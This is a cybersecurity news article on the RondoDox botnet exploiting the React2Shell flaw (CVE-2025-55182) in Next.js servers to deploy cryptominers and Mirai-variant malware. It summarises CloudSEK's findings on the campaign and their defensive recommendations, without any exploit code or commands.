Next.js Servers Compromised by RondoDox Botnet Exploiting React2Shell Vulnerability

RondoDox Botnet Exploits React2Shell Flaw to Breach Next.js Servers

The RondoDox botnet has been identified as using the critical React2Shell vulnerability (CVE-2025-55182) to infiltrate vulnerable Next.js servers with malware and cryptominers.

Initially disclosed by Fortinet in July 2025, RondoDox is a significant botnet that targets various zero-day vulnerabilities in global cyber attacks. Recently, VulnCheck discovered new RondoDox variants that utilize exploits for CVE-2025-24893, a crucial remote code execution (RCE) flaw in the XWiki Platform.

A recent report from cybersecurity firm CloudSEK reveals that RondoDox has been actively scanning for susceptible Next.js servers since December 8 and has been deploying botnet clients since then.

React2Shell is an unauthenticated remote code execution vulnerability that can be exploited through a single HTTP request and impacts all frameworks that implement the React Server Components (RSC) ‘Flight’ protocol, including Next.js.

This vulnerability has been exploited by various threat actors to compromise multiple organizations. For instance, North Korean hackers utilized React2Shell to distribute a new malware strain called EtherRAT.

As of December 30, the Shadowserver Foundation has reported over 94,000 internet-exposed assets vulnerable to React2Shell.

CloudSEK states that RondoDox has undergone three distinct operational phases in the current year:

• Reconnaissance and vulnerability testing from March to April 2025
• Automated web app exploitation from April to June 2025
• Large-scale IoT botnet deployment from July to the present

Regarding React2Shell, researchers note that RondoDox has intensified its exploitation efforts around this vulnerability, with over 40 exploit attempts recorded within six days in December.

During this phase, the botnet conducts hourly IoT exploitation waves targeting various routers to recruit new bots.

After identifying potentially vulnerable servers, CloudSEK reports that RondoDox has started deploying payloads that include a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a variant of Mirai (/nuts/x86).

The ‘bolts’ component eliminates competing botnet malware, establishes persistence via /etc/crontab, and terminates non-whitelisted processes every 45 seconds, according to researchers.

CloudSEK offers several recommendations for companies to defend against RondoDox activities, including auditing and patching Next.js Server Actions, segregating IoT devices into dedicated virtual LANs, and monitoring for suspicious process executions.